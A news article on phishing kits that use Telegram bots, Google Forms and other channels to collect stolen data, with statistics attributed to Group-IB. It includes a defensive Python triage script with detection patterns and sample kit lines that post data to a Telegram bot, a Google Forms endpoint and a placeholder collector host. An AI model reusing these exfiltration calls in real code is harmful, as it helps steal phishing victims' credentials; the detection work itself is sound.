Researchers recently discovered that cybercriminals are using Telegram bots and Google Forms to automate phishing. Read on to learn more…
Online scams are rising at an exponential rate, and cyber crooks have discovered a way to collect data stolen in phishing attacks by leveraging legitimate services. The cybercrime-as-a-service model has gained a lot of traction among cybercriminals, and these platforms are based on it.
Hackers have been known to sell data stolen during malicious campaigns using popular messaging platforms. As a result, more groups have begun to use this model, broadening the spectrum of threat activity.
Google Forms and Telegram Bots
According to a new report from cybersecurity firm Group-IB, threat actors are using Google Forms and Telegram as alternative methods of collecting stolen data and putting it to use immediately. Telegram bots are also used in automated phishing platforms available on the dark web. On these platforms, an admin panel manages the overall phishing attack and keeps the financial records associated with it.
The methods used to develop the phishing toolkits were thoroughly examined by Group-IB’s CERT. They found that, by 2020, the majority of toolkits were being used to emulate online services, such as online tools to view documents, online shopping, streaming services, and so on.
Commenting on the development, Yaroslav Kargalev, Deputy Head of CERT-GIB, said, “Phishing kits have changed the rules of the game in this segment of the fight against cybercrime. In the past, cybercriminals stopped their campaigns after the fraudulent resources had been blocked and quickly switched to other brands. Today, they automate their attacks and instantly replace the blocked phishing websites with new web pages. In turn, automating such attacks leads to the spread of more complex social engineering used in large-scale attacks rather than separate incidents, as used to be the case. This keeps one of the oldest cybercriminal professions afloat.”
Functionality of Phishing Kits
Phishing kits are capable of more than just creating fake websites or pages in order to steal user data. Some of them infect the victim’s computer with malicious payloads. Sellers of phishing toolkits have been known to use this tactic to trick their customers and make money twice.
Hackers can direct stolen data to their network hosts or intercept access to the customers’ hosting service by using a special script inserted in the phishing kit’s text body.
Some Statistics
Last year, phishing kits targeted over 260 different brands. The most popular use of these kits was to create web pages that imitated online services. Online platforms were the most targeted at 30.7 percent, followed by financial institutions at 20 percent. The most popular method of collecting the data harvested on phishing websites (66 percent) is through free email services. The majority of these email accounts were created with Yandex or Gmail.
Hackers can gather the data in two ways, locally and remotely. Alternative methods of collecting compromised data account for 6% of all cases. With the launch of phishing kits, the battle against cybercrime has become more difficult. Attacks are now automated, and blocked websites are replaced with new web pages almost immediately.
New Trend of Phishing Automation
Hackers used automation to replace blocked phishing websites, enabling them to carry out large-scale and complex phishing attacks. As a result of this trend, traditional methods of phishing attack prevention are becoming less successful. For collecting stolen data, the alternative approaches were often more dependable than email addresses, which could be blocked or hijacked.
It was found that hackers saved stolen data in a local file in the phishing resources or kits. Among the alternative methods, this was the most popular, accounting for 2.6 percent of all exfiltration methods. 1.6 percent were remote servers, 0.8 percent were Telegram bots, and 0.6 percent were MySQL databases.
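For defenders triaging a captured kit, the collection channels listed above can be spotted statically in the kit's source files. The following is an added example, not taken from Group-IB's report or from the original article; the regex indicators, file names and sample kit contents are constructed assumptions.

```python
import re

# Indicator patterns per collection channel named in the article.
# These are assumptions for illustration, not Group-IB signatures.
PATTERNS = {
    "email": re.compile(r"\bmail\s*\(|PHPMailer", re.I),
    "local_file": re.compile(r"\b(?:file_put_contents|fwrite|fputs)\s*\(", re.I),
    "telegram_bot": re.compile(r"api\.telegram\.org/bot", re.I),
    "google_forms": re.compile(r"docs\.google\.com/forms/[^\s\"']*formResponse", re.I),
    "mysql": re.compile(r"\bmysqli_connect\s*\(|new\s+mysqli\s*\(", re.I),
}
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
NET_CALL = re.compile(r"\b(?:curl_init|fsockopen|file_get_contents)\s*\(", re.I)
KNOWN_HOSTS = {"api.telegram.org", "docs.google.com"}

def classify(source):
    """Return the set of collection channels one source file appears to use."""
    found = {name for name, rx in PATTERNS.items() if rx.search(source)}
    hosts = {h.lower() for h in URL_HOST.findall(source)}
    # An outbound call to any other host counts as a generic remote server.
    if NET_CALL.search(source) and hosts - KNOWN_HOSTS:
        found.add("remote_server")
    return found

def triage(kit):
    """Map each channel to the sorted list of kit files that reference it."""
    report = {}
    for path in sorted(kit):
        for channel in classify(kit[path]):
            report.setdefault(channel, []).append(path)
    return report

# Constructed sample kit (path -> file contents); all values are placeholders.
SAMPLE_KIT = {
    "login.php": '<?php mail("drop@example.com", "log", $d); '
                 'file_put_contents("log.txt", $d, FILE_APPEND);',
    "send.php": '<?php $c = curl_init('
                '"https://api.telegram.org/bot000000:PLACEHOLDER/sendMessage");',
    "form.js": 'fetch("https://docs.google.com/forms/d/e/PLACEHOLDER/formResponse",'
               ' {method: "POST", body: d});',
    "gate.php": '<?php $c = curl_init("https://collector.example.net/gate.php");',
    "index.html": "<form action='login.php' method='post'></form>",
}

if __name__ == "__main__":
    for channel, files in sorted(triage(SAMPLE_KIT).items()):
        print(f"{channel:14} {', '.join(files)}")
```

A hit is a lead for manual review, since benign code also calls `mail()` or writes files; the channel found tells the responder where to send the takedown or abuse report.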
Concluding Words
All of the latest strategies and techniques developed by threat actors demonstrate that the traditional approach to tracking and blocking phishing websites is insufficient. The automation of these attacks could lead to the spread of sophisticated social engineering techniques used in large-scale attacks, perpetuating the age-old threat of phishing.